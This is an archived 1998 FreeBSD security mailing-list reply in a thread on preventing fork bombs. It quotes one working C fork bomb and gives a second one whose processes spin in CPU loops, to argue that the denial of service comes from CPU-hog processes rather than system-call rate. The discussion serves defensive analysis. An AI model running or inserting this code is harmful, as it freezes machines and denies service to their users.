From owner-freebsd-security  Sun Jul 26 06:32:25 1998
Return-Path: <owner-freebsd-security@FreeBSD.ORG>
Received: (from majordom@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id GAA24051
          for freebsd-security-outgoing; Sun, 26 Jul 1998 06:32:25 -0700 (PDT)
          (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.15.68.22])
          by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA24046
          for <freebsd-security@FreeBSD.ORG>; Sun, 26 Jul 1998 06:32:21 -0700 (PDT)
          (envelope-from bde@godzilla.zeta.org.au)
Received: (from bde@localhost)
	by godzilla.zeta.org.au (8.8.7/8.8.7) id XAA28114;
	Sun, 26 Jul 1998 23:31:52 +1000
Date: Sun, 26 Jul 1998 23:31:52 +1000
From: Bruce Evans <bde@zeta.org.au>
Message-Id: <199807261331.XAA28114@godzilla.zeta.org.au>
To: freebsd-security@FreeBSD.ORG, ncb05@uow.edu.au, rotel@indigo.ie
Subject: Re: preventing fork bombs
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>> #include <unistd.h>
>> 
>> main(void) {
>> 	while(1) {
>> 		fork();
>> 	}
>> }
>> 
>> The above effectively freezing my system. :\
>
>As has been previously observed the system call frequency is so
>high that this is still an effective DOS.  The solution is some
>kind of system call rate limiting.

This has nothing to do with system calls.  It has to do with there
being lots of CPU hog processes.

#include <err.h>
#include <unistd.h>

main()
{
	int nproc;

	nproc = 1;
	for (;;) {
		switch (fork()) {
		case -1:
			warnx("created %d looping processes", nproc);
			for (;;)
				;
		case 0:
			for (;;)
				;
		default:
			nproc++;
			break;
		}
	}
}

Bruce

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe security" in the body of the message